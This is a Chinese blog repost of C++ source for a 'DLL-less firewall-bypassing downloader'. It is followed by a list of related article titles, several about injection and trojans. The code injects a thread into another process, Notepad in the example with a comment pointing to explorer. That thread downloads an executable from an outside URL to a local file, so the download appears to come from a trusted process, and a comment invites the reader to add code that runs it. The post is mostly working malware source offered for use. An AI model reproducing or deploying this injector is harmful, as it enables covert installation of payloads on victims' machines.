无DLL 穿防火墙下载者
来源:互联网 发布:大数据 学什么语言 编辑:程序博客网 时间:2024/04/29 00:24
#include <windows.h>
#define MAXINJECTSIZE (1024*4)
struct tagDownInfo
{
TCHAR szUrl[500];
TCHAR szFile[500];
TCHAR szUrlmon[30];
TCHAR szUrlDowndToFile[30];
TCHAR szMessageBox[500];
TCHAR szUser32_lib[10];
bool bIsRun;
DWORD dwRunMode;
FARPROC funFunGetModuleHandleAddr;
FARPROC funFunGetProcAddressAddr;
FARPROC funFunLoadLibraryAddr;
};
bool HideDownFile(tagDownInfo* pInfo, DWORD dwProcessId);
DWORD WINAPI ThreadDown(LPVOID lParam)
{
tagDownInfo* pInfo = (tagDownInfo*)lParam;
typedef long (__stdcall* T_MessageBox)(HWND,LPCTSTR,LPCTSTR,DWORD);
typedef long (__stdcall* T_URLDownloadToFile)(LPVOID,LPCTSTR,LPCTSTR,DWORD, LPVOID );
typedef HMODULE (__stdcall* T_GetProcAddress)(HMODULE ,LPCSTR);
typedef HMODULE (__stdcall* T_GetModuleHandle)(LPCTSTR);
typedef HMODULE (__stdcall* T_LoadLibrary)(LPCTSTR);
typedef void (__stdcall* pSleep)( DWORD dwMilliseconds);
//三个重要的函数地址
T_GetModuleHandle pGetModuleHandle = (T_GetModuleHandle)pInfo->funFunGetModuleHandleAddr;
T_GetProcAddress pGetProcAddress = (T_GetProcAddress)pInfo->funFunGetProcAddressAddr;
T_LoadLibrary pLoadLibrary = (T_LoadLibrary)pInfo->funFunLoadLibraryAddr;
HMODULE hUser32Dll = pLoadLibrary(pInfo->szUser32_lib );
T_MessageBox pMessageBox =(T_MessageBox)pGetProcAddress(hUser32Dll, pInfo->szMessageBox);
pMessageBox(NULL, pInfo->szUrl, pInfo->szFile, 0);
HMODULE hDll = pLoadLibrary( pInfo->szUrlmon );
T_URLDownloadToFile pURLDownloadToFile = (T_URLDownloadToFile)pGetProcAddress( hDll, pInfo->szUrlDowndToFile);
pURLDownloadToFile(NULL, pInfo->szUrl, pInfo->szFile, 0, NULL);
return 0;
}
bool HideDownFile(tagDownInfo* pInfo, DWORD dwProcessId)
{
HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwProcessId);
if(hProcess == NULL)
return false;
HINSTANCE hLibDll = GetModuleHandle("Kernel32.dll");
pInfo->funFunGetProcAddressAddr = (FARPROC)GetProcAddress(hLibDll, "GetProcAddress");
pInfo->funFunGetModuleHandleAddr = (FARPROC)GetProcAddress(hLibDll, "GetModuleHandleA");
pInfo->funFunLoadLibraryAddr=(FARPROC)GetProcAddress(hLibDll, "LoadLibraryA");
lstrcpy(pInfo->szUrlmon, "Urlmon.dll");
lstrcpy(pInfo->szUrlDowndToFile, "URLDownloadToFileA");
lstrcpy(pInfo->szMessageBox, "MessageBoxA");
lstrcpy(pInfo->szUser32_lib, "User32.dll");
//分配空间
void *pRemoteThread = VirtualAllocEx(hProcess, 0, MAXINJECTSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (! pRemoteThread)
return false;
tagDownInfo *pData = (tagDownInfo*)VirtualAllocEx(hProcess, 0, sizeof (tagDownInfo), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!pData)
return false;
if (! WriteProcessMemory(hProcess, pRemoteThread, &ThreadDown, MAXINJECTSIZE, 0))
return false;
if (! WriteProcessMemory(hProcess, pData, pInfo, sizeof (tagDownInfo), 0))
return false;
bool bRet = true;
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteThread, pData, 0, NULL);
if(!hThread)
bRet = false;
WaitForSingleObject(hThread, INFINITE);
VirtualFreeEx(hProcess, pRemoteThread, MAXINJECTSIZE, MEM_RELEASE);
VirtualFreeEx(hProcess, pData, sizeof (tagDownInfo), MEM_RELEASE);
//自己加上运行程序的代码即可 在其他线程运行也可以就是多加加载 shell32.dll 即可
CloseHandle(hThread);
CloseHandle(hProcess);
return bRet;
}
#include <windows.h>
#include "HideDownFile.CPP"
#include "conio.h"
int main(int argc, char* argv[])
{
// ===== 获得需要创建REMOTETHREAD的进程句柄 ===============================
HWND hWnd = FindWindow("notepad", NULL); // 以NOTEPAD为例 修改下即可插入 explorer
DWORD dwProcessId;
::GetWindowThreadProcessId(hWnd, &dwProcessId);
tagDownInfo info;
ZeroMemory(&info, sizeof(tagDownInfo));
strcpy(info.szFile, "e://1.exe");
strcpy(info.szUrl, "http://www.shineway.com/aspnet/adsl.exe");
HideDownFile(&info, dwProcessId);
return 0;
}
- 无DLL 穿防火墙下载者
- tomcat jmx穿防火墙
- 无DLL,插IE下载者 3.5K
- 无Dll插入进程,下载者VC源代码
- 无Dll插入进程、下载者VC源代码
- Delphi编写无DLL版穿墙的下载者
- 无dll插入进程,下载者vc源代码
- delphi实现穿XP防火墙
- 转:新的穿防火墙技术
- dll下载者~~
- 在XP下oracle端口穿防火墙问题
- 使用Java连接处于proxy(or防火墙)之外的HTTP服务器[穿防火墙]
- COMODO防火墙下载
- COMODO防火墙专业版下载
- 无dll无进程木马
- 无进程无DLL无硬盘文件
- 无进程DLL木马
- WIN32注入(无dll)
- Win32 PE病毒入门教程
- wow 宏 1
- 软件工程师的健康问题
- JBPM用户指南翻译:第3章 指南
- wow 宏命令的设置流程
- 无DLL 穿防火墙下载者
- 终于逮着VS.PHP 2.0.2.2635的破解补丁了
- 我们生于80年代
- 更改Delphi系统的默认字体
- 在页面中动态查询数据库信息
- Dot.net安全机制
- 学习整理清单
- 国外房地产搜索引擎简介之二
- SQL优化-索引